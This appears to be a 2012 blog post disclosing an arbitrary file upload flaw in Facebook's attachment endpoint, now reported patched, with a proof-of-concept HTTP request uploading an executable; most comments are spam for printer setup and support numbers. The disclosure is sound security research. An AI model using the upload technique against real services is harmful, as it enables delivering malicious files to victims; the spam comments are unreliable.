facebook Password Reset Vulnerability Found in

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Thursday, 3 May 2012

Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com

Posted on 01:50 by freda
Description
Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.facebook.com, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
===========
POST /ajax/messaging/upload.php HTTP/1.1
Host: attachments.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------4827543632391
Content-Length: 194188

-----------------------------4827543632391
Content-Disposition: form-data; name="post_form_id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="id"

[information removed]
-----------------------------4827543632391
Content-Disposition: form-data; name="attachment"; filename="notepad.EXE"
Content-Type: application/octet-stream


Conclusion
This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

https://www.facebook.com/whitehat
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in Arbitrary File Upload, Facebook | 17 comments
Newer Post Older Post Home

17 comments:

  1. Hadoop Langi22 January 2019 at 01:25

    123 HP Envy 5075 Printer Setup, 123 HP Envy 5075 Printer Setup, 123 HP Envy 5075 Printer Setup, 123 HP Envy 5075 Printer Setup

    ReplyDelete
    Replies
      Reply
  2. Nancy patricia18 February 2019 at 22:43

    Supporting you 123.hp.com/setup 5258

    ReplyDelete
    Replies
      Reply
  3. Prabar Manick26 February 2019 at 01:59

    123.hp.com/setup 3700

    ReplyDelete
    Replies
      Reply
  4. Nancy patricia14 March 2019 at 02:47

    123.hp.com/setup 3735

    ReplyDelete
    Replies
      Reply
  5. micky17 March 2019 at 21:40

    123.hp.com/setup 7820

    ReplyDelete
    Replies
      Reply
  6. Laura Honey26 March 2019 at 01:56

    123.hp.com/setup 5541

    ReplyDelete
    Replies
      Reply
  7. Franklin clement28 March 2019 at 01:29

    123.hp.com/setup 5264

    ReplyDelete
    Replies
      Reply
  8. Cesar Rellos12 June 2019 at 07:56

    Hi, probably our entry may be off topic but anyways, I have been surfing around your blog and it looks very professional. It’s obvious you know your topic and you appear fervent about it. I’m developing a fresh blog plus I’m struggling to make it look good, as well as offer the best quality content. I have learned much at your web site and also I anticipate alot more articles and will be coming back soon. Thanks you.


    123.hp.com/ojpro8710

    ReplyDelete
    Replies
      Reply
  9. Alexa App Guide23 July 2019 at 09:34

    Taking about Alexa & Echo duo the Echo is the loudspeaker whereas Alexa is the speech software. They together work to perform a various task that we call as Alexa skills.

    for more details 844 260 1666.

    ReplyDelete
    Replies
      Reply
  10. Evelyn Jesse24 July 2019 at 22:51

    https://setup-wireless-printer.com/hp-photosmart-c5288-wireless-driver-mac/

    ReplyDelete
    Replies
      Reply
  11. Magdelin Linda13 September 2019 at 02:41

    123hp.co/setup

    ReplyDelete
    Replies
      Reply
  12. Magdelin Linda13 September 2019 at 02:42

    123hp.co/setup

    ReplyDelete
    Replies
      Reply
  13. Ronaldo drogba3 October 2019 at 22:00

    for more information visit us Roku.com/link

    ReplyDelete
    Replies
      Reply
  14. Alex Jones15 October 2019 at 04:09

    It’s our vision to offer timely support for HP customers as we are an independent service provider. The top services that we offer include 123.hp.com/setup, software download, troubleshooting network issues, suggest the top device models to buy and much more. Reach out to our support executives for assistance and you can dial the support number +1-844-876-5110

    ReplyDelete
    Replies
      Reply
  15. Jessy Mac6 December 2019 at 02:13

    123.hp.com, canon pixma mg4250 driver , canon pixma mp990 driver , canon pixma mp620b driver , canon imageclass mf215 driver ,

    ReplyDelete
    Replies
      Reply
  16. a123hp21 February 2020 at 04:54

    This comment has been removed by the author.

    ReplyDelete
    Replies
      Reply
  17. Roku-comlink9 June 2020 at 03:29

    You will have to use the Roku Activation code on roku.com/link. And aftercompleting your registration, you are all set to dive into the pool of entertainment.To proceed with this you need to insert the Roku streaming stick on HDMI slot behind your TV.

    ReplyDelete
    Replies
      Reply
Add comment
Load more...

Subscribe to: Post Comments (Atom)

Popular Posts

  • Pligg CMS 1.1.4 Cross-Site Scripting (XSS) Vulnerability
    Description Pligg is an open source CMS (Content Management System) that you can download and use for free. Pligg CMS provides social publis...
  • Facebook Bug #1: Arbitrary File Upload Vulnerability Found in attachments.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in attachments.f...
  • Sybase EAServer 6.3.1 Directory Traversal Vulnerability
    Description Sybase EAServer is the leading solution for distributed and Web-enabled PowerBuilder applications. EA Server can be used to run ...
  • FileCOPA FTP Server 5.02 Directory Traversal Vulnerability
    Description FileCOPA is a commercial FTP server for Windows that is available as shareware. Sow Ching Shiong, an independent vulnerability r...
  • Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsof...
  • Facebook Bug #4: Password Reset Vulnerability Found in www.facebook.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Password Reset vulnerability in www.facebook.com, whi...
  • Trend Micro Control Manager 5.5 Directory Traversal Vulnerability
    Description Trend Micro Control Manager provides a convenient centralized security management console that is designed to minimize administr...
  • F-Secure Policy Manager Web Reporting 9.00.30231 Path Disclosure and Cross-Site Scripting (XSS) Vulnerability
    Description F-Secure Policy Manager Web Reporting allow administrators to identify computers that are unprotected or vulnerable to virus out...
  • Microsoft Bug #1: Cross-Site Scripting (XSS) Found in connect.microsoft.com
    Description Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.m...
  • Oracle Secure Backup 10.3.0.3.0 Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities
    Description Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of f...

Categories

  • Adobe
  • Apache
  • Apple
  • Arbitrary File Upload
  • CSRF
  • Directory Traversal
  • F-Secure
  • Facebook
  • HP
  • Microsoft
  • Oracle
  • Password Reset
  • SQL Injection
  • Sybase
  • Symantec
  • Trend Micro
  • Twitter
  • XSS

Blog Archive

  • ►  2013 (1)
    • ►  January (1)
  • ▼  2012 (25)
    • ►  July (1)
    • ▼  May (4)
      • Facebook Bug #3: Arbitrary File Upload Vulnerabili...
      • Facebook Bug #2: Arbitrary File Upload Vulnerabili...
      • Microsoft Bug #1: Cross-Site Scripting (XSS) Found...
      • Facebook Bug #1: Arbitrary File Upload Vulnerabili...
    • ►  April (20)
Powered by Blogger.

About Me

freda
View my complete profile